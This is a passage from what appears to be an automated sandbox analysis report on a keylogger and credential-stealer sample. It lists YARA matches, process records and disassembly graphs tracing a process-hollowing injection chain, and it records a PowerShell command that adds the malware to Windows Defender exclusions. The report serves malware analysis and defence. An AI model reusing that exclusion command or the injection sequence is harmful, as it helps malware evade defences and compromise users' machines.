                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:12:08:08
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0x1390000
                                                                                                                                  File size:427'008 bytes
                                                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:12:08:08
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0xf10000
                                                                                                                                  File size:837'120 bytes
                                                                                                                                  MD5 hash:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:12:08:23
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:543'304 bytes
                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:14.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:126
                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                    execution_graph 10267 96019a 10268 960260 10267->10268 10269 9601a4 10267->10269 10272 960fb8 10269->10272 10289 960fa8 10269->10289 10273 960fd2 10272->10273 10306 961534 10273->10306 10311 961680 10273->10311 10315 961562 10273->10315 10320 9613c7 10273->10320 10325 961866 10273->10325 10331 961bb8 10273->10331 10337 961818 10273->10337 10344 96175a 10273->10344 10349 9616fa 10273->10349 10354 961c5c 10273->10354 10358 96163c 10273->10358 10364 9614b1 10273->10364 10369 9617b2 10273->10369 10373 9615f5 10273->10373 10274 960ff6 10274->10268 10290 960fb8 10289->10290 10292 961534 2 API calls 10290->10292 10293 9615f5 2 API calls 10290->10293 10294 9617b2 2 API calls 10290->10294 10295 9614b1 2 API calls 10290->10295 10296 96163c 2 API calls 10290->10296 10297 961c5c 2 API calls 10290->10297 10298 9616fa 2 API calls 10290->10298 10299 96175a 2 API calls 10290->10299 10300 961818 2 API calls 10290->10300 10301 961bb8 2 API calls 10290->10301 10302 961866 2 API calls 10290->10302 10303 9613c7 2 API calls 10290->10303 10304 961562 2 API calls 10290->10304 10305 961680 2 API calls 10290->10305 10291 960ff6 10291->10268 10292->10291 10293->10291 10294->10291 10295->10291 10296->10291 10297->10291 10298->10291 10299->10291 10300->10291 10301->10291 10302->10291 10303->10291 10304->10291 10305->10291 10307 961558 10306->10307 10378 48f6a8 10307->10378 10382 48f6b0 10307->10382 10308 9619e8 10386 48f588 10311->10386 10390 48f580 10311->10390 10312 96164f 10312->10311 10316 961b10 10315->10316 10318 48f6a8 WriteProcessMemory 10316->10318 10319 48f6b0 WriteProcessMemory 10316->10319 10317 9613bb 10317->10274 10318->10317 10319->10317 10321 9613ec 10320->10321 10394 48fa48 10321->10394 10398 48fa3c 10321->10398 10326 961774 10325->10326 10328 9613bb 10326->10328 10402 48f368 10326->10402 10406 48f364 10326->10406 10327 961789 10327->10274 10328->10274 10332 961bc5 10331->10332 10333 9616fa 10331->10333 10335 48f368 ResumeThread 10333->10335 10336 48f364 ResumeThread 10333->10336 10334 961789 10334->10274 10335->10334 10336->10334 10338 961774 10337->10338 10341 9613bb 10337->10341 10339 96195a 10338->10339 10342 48f368 ResumeThread 10338->10342 10343 48f364 ResumeThread 10338->10343 10340 961789 10340->10274 10341->10274 10342->10340 10343->10340 10345 961763 10344->10345 10347 48f368 ResumeThread 10345->10347 10348 48f364 ResumeThread 10345->10348 10346 961789 10346->10274 10347->10346 10348->10346 10350 961700 10349->10350 10352 48f368 ResumeThread 10350->10352 10353 48f364 ResumeThread 10350->10353 10351 961789 10351->10274 10352->10351 10353->10351 10410 9621f8 10354->10410 10415 962208 10354->10415 10355 961c74 10359 96156a 10358->10359 10360 961e33 10359->10360 10362 48f6a8 WriteProcessMemory 10359->10362 10363 48f6b0 WriteProcessMemory 10359->10363 10361 9613bb 10361->10274 10362->10361 10363->10361 10365 9613e2 10364->10365 10367 48fa48 CreateProcessA 10365->10367 10368 48fa3c CreateProcessA 10365->10368 10366 9614fd 10367->10366 10368->10366 10428 48f808 10369->10428 10432 48f810 10369->10432 10370 9617d7 10374 961618 10373->10374 10376 48f6a8 WriteProcessMemory 10374->10376 10377 48f6b0 WriteProcessMemory 10374->10377 10375 961a36 10376->10375 10377->10375 10379 48f6b0 WriteProcessMemory 10378->10379 10381 48f79b 10379->10381 10381->10308 10383 48f6fc WriteProcessMemory 10382->10383 10385 48f79b 10383->10385 10385->10308 10387 48f5cc VirtualAllocEx 10386->10387 10389 48f64a 10387->10389 10389->10312 10391 48f588 VirtualAllocEx 10390->10391 10393 48f64a 10391->10393 10393->10312 10395 48facf CreateProcessA 10394->10395 10397 48fd2d 10395->10397 10397->10397 10399 48facf CreateProcessA 10398->10399 10401 48fd2d 10399->10401 10403 48f3ac ResumeThread 10402->10403 10405 48f3fe 10403->10405 10405->10327 10407 48f3ac ResumeThread 10406->10407 10409 48f3fe 10407->10409 10409->10327 10411 96221d 10410->10411 10420 48f458 10411->10420 10424 48f453 10411->10424 10412 962233 10412->10355 10416 96221d 10415->10416 10418 48f458 Wow64SetThreadContext 10416->10418 10419 48f453 Wow64SetThreadContext 10416->10419 10417 962233 10417->10355 10418->10417 10419->10417 10421 48f4a1 Wow64SetThreadContext 10420->10421 10423 48f51f 10421->10423 10423->10412 10425 48f4a1 Wow64SetThreadContext 10424->10425 10427 48f51f 10425->10427 10427->10412 10429 48f810 ReadProcessMemory 10428->10429 10431 48f8da 10429->10431 10431->10370 10433 48f85c ReadProcessMemory 10432->10433 10435 48f8da 10433->10435 10435->10370

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00483C78 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 483c78-483ca0 1 483ca2 0->1 2 483ca7-483d63 0->2 1->2 5 483d68-483d75 2->5 6 483d65-483d8b 2->6 5->6 8 48427b-4842bd 6->8 9 483d91-483dbb 6->9 18 4842c0-4842c4 8->18 12 484488-484494 9->12 13 483dc1-483dd9 9->13 14 48449a-4844a3 12->14 13->14 15 483ddf-483de0 13->15 23 4844a9-4844b5 14->23 17 48446e-48447a 15->17 21 484480-484487 17->21 22 483de5-483df1 17->22 19 4842ca-4842d0 18->19 20 483e96-483e9a 18->20 19->8 24 4842d2-48432d 19->24 25 483eac-483eb2 20->25 26 483e9c-483eaa 20->26 27 483df8-483e13 22->27 28 483df3 22->28 32 4844bb-4844c7 23->32 47 48432f-484362 24->47 48 484364-48438e 24->48 30 483ef7-483efb 25->30 29 483f0a-483f3c 26->29 27->23 31 483e19-483e3e 27->31 28->27 54 483f3e-483f4a 29->54 55 483f66 29->55 33 483efd 30->33 34 483eb4-483ec0 30->34 31->32 46 483e44-483e46 31->46 36 4844cd-4844d4 32->36 37 483f00-483f04 33->37 39 483ec2 34->39 40 483ec7-483ecf 34->40 37->29 42 483e7c-483e93 37->42 39->40 44 483ed1-483ee5 40->44 45 483ef4 40->45 42->20 50 483e49-483e54 44->50 51 483eeb-483ef2 44->51 45->30 46->50 62 484397-484416 47->62 48->62 50->36 52 483e5a-483e77 50->52 51->33 52->37 57 483f4c-483f52 54->57 58 483f54-483f5a 54->58 60 483f6c-483f99 55->60 63 483f64 57->63 58->63 67 483fe8-48407b 60->67 68 483f9b-483fd3 60->68 75 48441d-484430 62->75 63->60 83 48407d 67->83 84 484084-484085 67->84 76 48443f-484444 68->76 75->76 77 48445b-48446b 76->77 78 484446-484454 76->78 77->17 78->77 83->84 85 4840d6-4840dc 84->85 86 4840de-4841a0 85->86 87 484087-4840a6 85->87 98 4841e1-4841e5 86->98 99 4841a2-4841db 86->99 88 4840a8 87->88 89 4840ad-4840d3 87->89 88->89 89->85 100 484226-48422a 98->100 101 4841e7-484220 98->101 99->98 102 48426b-48426f 100->102 103 48422c-484265 100->103 101->100 102->24 106 484271-484279 102->106 103->102 106->18
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'p$:$pp$~
                                                                                                                                    • API String ID: 0-1820105848
                                                                                                                                    • Opcode ID: d476d690ab3d1391c8151ea91593f1c1a704b6d9da540f6eaa58791f9b340015
                                                                                                                                    • Instruction ID: 445f9a304db0fa832f885df92041833dceb6ca2693e88c7d81070702411a5ffc
                                                                                                                                    • Opcode Fuzzy Hash: d476d690ab3d1391c8151ea91593f1c1a704b6d9da540f6eaa58791f9b340015
                                                                                                                                    • Instruction Fuzzy Hash: 0E42F375A00218DFDB15DFA9C980B9DBBB2FF88304F1584EAE509AB261D7319E91DF10
                                                                                                                                    Function 0048070C Relevance: 4.2, Strings: 2, Instructions: 1674COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 108 48070c-48182b 111 48182d 108->111 112 481832-481f3b call 4806dc call 4813d8 * 5 call 4806ec * 3 call 4813ec call 4813fc call 48140c call 48141c call 48142c call 48143c call 48144c call 48145c call 48146c call 48147c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c call 4814ac call 4814bc 108->112 111->112 214 48208a-4820a3 112->214 215 4820a9-4820ed 214->215 216 481f40-481f5e 214->216 232 482109 215->232 233 4820ef-4820fb 215->233 217 481f60 216->217 218 481f65-481f7f 216->218 217->218 220 481f81 218->220 221 481f86-481f9c 218->221 220->221 222 481f9e 221->222 223 481fa3-481fc6 call 4814cc 221->223 222->223 227 481fc8 223->227 228 481fcd-481fdd 223->228 227->228 230 481fdf 228->230 231 481fe4-48202b 228->231 230->231 234 48202d 231->234 235 482034-482040 231->235 238 48210f-4821b1 232->238 236 4820fd-482103 233->236 237 482105 233->237 234->235 239 482042 235->239 240 482047-482058 235->240 241 482107 236->241 237->241 251 4821b8-4821d8 238->251 252 4821b3 238->252 239->240 243 48205a 240->243 244 48205f-482075 240->244 241->238 243->244 245 48207c-482087 244->245 246 482077 244->246 245->214 246->245 254 4821da 251->254 255 4821df-482318 251->255 252->251 254->255 267 482324-483346 call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 4814dc call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 4814dc call 48149c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 4814fc call 48141c call 48142c call 48143c call 48144c call 48150c call 48151c call 48152c call 48153c call 48154c call 48155c call 48071c * 10 call 48156c 255->267 461 483348-483354 267->461 462 483370 267->462 463 48335e-483364 461->463 464 483356-48335c 461->464 465 483376-483447 call 48157c call 48158c call 48159c call 48143c call 4815ac 462->465 466 48336e 463->466 464->466 466->465
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $p$}/
                                                                                                                                    • API String ID: 0-2871476230
                                                                                                                                    • Opcode ID: dd4737be5b3b5c5e07935df0b0b63140499f6b12b0d2756ec3f9d242abb70156
                                                                                                                                    • Instruction ID: 09226d4e5227feedefe58231eee4d4fe808e4b7e7d8e92d4d26809decb64d76c
                                                                                                                                    • Opcode Fuzzy Hash: dd4737be5b3b5c5e07935df0b0b63140499f6b12b0d2756ec3f9d242abb70156
                                                                                                                                    • Instruction Fuzzy Hash: 9903E534A103198FDB25EF64C894A9DB7B5FF89300F5186EAE4096B361DB34AE85CF44
                                                                                                                                    Function 004817F0 Relevance: 4.1, Strings: 2, Instructions: 1578COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 480 4817f0-48182b 481 48182d 480->481 482 481832-481a65 call 4806dc call 4813d8 * 5 call 4806ec * 3 480->482 481->482 523 481a6f-481a7b call 4813ec 482->523 525 481a80-481ac5 call 4813fc 523->525 530 481acd-481ae0 525->530 531 481ae6-481e68 call 48140c call 48141c call 48142c call 48143c call 48144c call 48145c call 48146c call 48147c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c 530->531 573 481e6d-481e6e 531->573 574 481e78-481f3b call 4814ac call 4814bc 573->574 584 48208a-4820a3 574->584 585 4820a9-4820ed 584->585 586 481f40-481f5e 584->586 602 482109 585->602 603 4820ef-4820fb 585->603 587 481f60 586->587 588 481f65-481f7f 586->588 587->588 590 481f81 588->590 591 481f86-481f9c 588->591 590->591 592 481f9e 591->592 593 481fa3-481fc6 call 4814cc 591->593 592->593 597 481fc8 593->597 598 481fcd-481fdd 593->598 597->598 600 481fdf 598->600 601 481fe4-48202b 598->601 600->601 604 48202d 601->604 605 482034-482040 601->605 608 48210f-48214d 602->608 606 4820fd-482103 603->606 607 482105 603->607 604->605 609 482042 605->609 610 482047-482058 605->610 611 482107 606->611 607->611 617 482154-482172 608->617 609->610 613 48205a 610->613 614 48205f-482075 610->614 611->608 613->614 615 48207c-482087 614->615 616 482077 614->616 615->584 616->615 618 48217d-482189 617->618 619 482193-48219b 618->619 620 4821a1-4821b1 619->620 621 4821b8-4821d8 620->621 622 4821b3 620->622 624 4821da 621->624 625 4821df-4822fb 621->625 622->621 624->625 636 482306-482318 625->636 637 482324-483346 call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 48149c call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 4814dc call 48141c call 48142c call 48143c call 48144c call 48146c call 48148c call 4814dc call 48149c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 48141c call 48142c call 48143c call 4814ec call 48144c call 48146c call 4814fc call 48141c call 48142c call 48143c call 48144c call 48150c call 48151c call 48152c call 48153c call 48154c call 48155c call 48071c * 10 call 48156c 636->637 831 483348-483354 637->831 832 483370 637->832 833 48335e-483364 831->833 834 483356-48335c 831->834 835 483376-483447 call 48157c call 48158c call 48159c call 48143c call 4815ac 832->835 836 48336e 833->836 834->836 836->835
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $p$}/
                                                                                                                                    • API String ID: 0-2871476230
                                                                                                                                    • Opcode ID: 078e2b2e2578adc3272232774f4dd31a2ceaecb5e0382a614f13a6bb4e2d253e
                                                                                                                                    • Instruction ID: d82a78cc7e99e00547b11348d3d8c62db07af3ea7862239a091e890ca49c8d96
                                                                                                                                    • Opcode Fuzzy Hash: 078e2b2e2578adc3272232774f4dd31a2ceaecb5e0382a614f13a6bb4e2d253e
                                                                                                                                    • Instruction Fuzzy Hash: 6CF2E634A10319CFDB25EF64C894A99B7B5FF89300F5186EAE4096B361DB30AE85CF44
                                                                                                                                    Function 0048FA3C Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 964 48fa3c-48fae1 966 48fb2a-48fb52 964->966 967 48fae3-48fafa 964->967 970 48fb98-48fbee 966->970 971 48fb54-48fb68 966->971 967->966 972 48fafc-48fb01 967->972 981 48fbf0-48fc04 970->981 982 48fc34-48fd2b CreateProcessA 970->982 971->970 979 48fb6a-48fb6f 971->979 973 48fb03-48fb0d 972->973 974 48fb24-48fb27 972->974 976 48fb0f 973->976 977 48fb11-48fb20 973->977 974->966 976->977 977->977 980 48fb22 977->980 983 48fb71-48fb7b 979->983 984 48fb92-48fb95 979->984 980->974 981->982 989 48fc06-48fc0b 981->989 1000 48fd2d-48fd33 982->1000 1001 48fd34-48fe19 982->1001 985 48fb7d 983->985 986 48fb7f-48fb8e 983->986 984->970 985->986 986->986 990 48fb90 986->990 991 48fc0d-48fc17 989->991 992 48fc2e-48fc31 989->992 990->984 994 48fc19 991->994 995 48fc1b-48fc2a 991->995 992->982 994->995 995->995 996 48fc2c 995->996 996->992 1000->1001 1013 48fe29-48fe2d 1001->1013 1014 48fe1b-48fe1f 1001->1014 1016 48fe3d-48fe41 1013->1016 1017 48fe2f-48fe33 1013->1017 1014->1013 1015 48fe21 1014->1015 1015->1013 1018 48fe51-48fe55 1016->1018 1019 48fe43-48fe47 1016->1019 1017->1016 1020 48fe35 1017->1020 1022 48fe8b-48fe96 1018->1022 1023 48fe57-48fe80 1018->1023 1019->1018 1021 48fe49 1019->1021 1020->1016 1021->1018 1027 48fe97 1022->1027 1023->1022 1027->1027
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0048FD0F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 020aa0f1f5a604640a8a63405003d64e3b2c6cd461e0446640c9b7acb455f088
                                                                                                                                    • Instruction ID: 74d93d1c69fc51f0b14fd914b448bb91b9e1c84d30876b4c7b7a621f1e1b5a56
                                                                                                                                    • Opcode Fuzzy Hash: 020aa0f1f5a604640a8a63405003d64e3b2c6cd461e0446640c9b7acb455f088
                                                                                                                                    • Instruction Fuzzy Hash: 55C11571D002198FDF24DFA8C851BEEBBB1BB09300F1095AAD859B7250DB749A89CF94
                                                                                                                                    Function 0048FA48 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1028 48fa48-48fae1 1030 48fb2a-48fb52 1028->1030 1031 48fae3-48fafa 1028->1031 1034 48fb98-48fbee 1030->1034 1035 48fb54-48fb68 1030->1035 1031->1030 1036 48fafc-48fb01 1031->1036 1045 48fbf0-48fc04 1034->1045 1046 48fc34-48fd2b CreateProcessA 1034->1046 1035->1034 1043 48fb6a-48fb6f 1035->1043 1037 48fb03-48fb0d 1036->1037 1038 48fb24-48fb27 1036->1038 1040 48fb0f 1037->1040 1041 48fb11-48fb20 1037->1041 1038->1030 1040->1041 1041->1041 1044 48fb22 1041->1044 1047 48fb71-48fb7b 1043->1047 1048 48fb92-48fb95 1043->1048 1044->1038 1045->1046 1053 48fc06-48fc0b 1045->1053 1064 48fd2d-48fd33 1046->1064 1065 48fd34-48fe19 1046->1065 1049 48fb7d 1047->1049 1050 48fb7f-48fb8e 1047->1050 1048->1034 1049->1050 1050->1050 1054 48fb90 1050->1054 1055 48fc0d-48fc17 1053->1055 1056 48fc2e-48fc31 1053->1056 1054->1048 1058 48fc19 1055->1058 1059 48fc1b-48fc2a 1055->1059 1056->1046 1058->1059 1059->1059 1060 48fc2c 1059->1060 1060->1056 1064->1065 1077 48fe29-48fe2d 1065->1077 1078 48fe1b-48fe1f 1065->1078 1080 48fe3d-48fe41 1077->1080 1081 48fe2f-48fe33 1077->1081 1078->1077 1079 48fe21 1078->1079 1079->1077 1082 48fe51-48fe55 1080->1082 1083 48fe43-48fe47 1080->1083 1081->1080 1084 48fe35 1081->1084 1086 48fe8b-48fe96 1082->1086 1087 48fe57-48fe80 1082->1087 1083->1082 1085 48fe49 1083->1085 1084->1080 1085->1082 1091 48fe97 1086->1091 1087->1086 1091->1091
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0048FD0F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 45eb9e7c98dd68b26f7fc67883f20295db49f3026c30e6ca47fda0f2aaec8fca
                                                                                                                                    • Instruction ID: 12146aefba95ebc64206a28d2ce44e20ade30d4b4ed4723b7e5c0d76db091eba
                                                                                                                                    • Opcode Fuzzy Hash: 45eb9e7c98dd68b26f7fc67883f20295db49f3026c30e6ca47fda0f2aaec8fca
                                                                                                                                    • Instruction Fuzzy Hash: C6C11571D0021D8FDF24DFA8C851BEEBBB1BB09300F1095AAD919B7250DB749A89CF94
                                                                                                                                    Function 0048F6A8 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1092 48f6a8-48f71b 1095 48f71d-48f72f 1092->1095 1096 48f732-48f799 WriteProcessMemory 1092->1096 1095->1096 1098 48f79b-48f7a1 1096->1098 1099 48f7a2-48f7f4 1096->1099 1098->1099
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F783
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 00166ee63447c70219e8a6d954160aed6fcc792deebe8fa08b70e623dfa8225b
                                                                                                                                    • Instruction ID: 480b9798fec971056851925896c9e8c2244e60495872a189bb49edb5bdfce23f
                                                                                                                                    • Opcode Fuzzy Hash: 00166ee63447c70219e8a6d954160aed6fcc792deebe8fa08b70e623dfa8225b
                                                                                                                                    • Instruction Fuzzy Hash: 4B41BDB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D338AA45CF64
                                                                                                                                    Function 0048F6B0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1104 48f6b0-48f71b 1106 48f71d-48f72f 1104->1106 1107 48f732-48f799 WriteProcessMemory 1104->1107 1106->1107 1109 48f79b-48f7a1 1107->1109 1110 48f7a2-48f7f4 1107->1110 1109->1110
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F783
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 88e57672f3e421bd802041add8aa89fe30b922e2b06d60e657d706b8b044d02a
                                                                                                                                    • Instruction ID: c2f1d85ab79ad48c00d75c70468a7848cb9b80fa746da688cbde8d4c509fef2f
                                                                                                                                    • Opcode Fuzzy Hash: 88e57672f3e421bd802041add8aa89fe30b922e2b06d60e657d706b8b044d02a
                                                                                                                                    • Instruction Fuzzy Hash: 36419EB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D734AA45CF64
                                                                                                                                    Function 0048F808 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1115 48f808-48f8d8 ReadProcessMemory 1119 48f8da-48f8e0 1115->1119 1120 48f8e1-48f933 1115->1120 1119->1120
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F8C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: e0ccd8b94a9b223e23ed8fb583f0135ab9c9a918ffbcfdb8222ea702537ebe7a
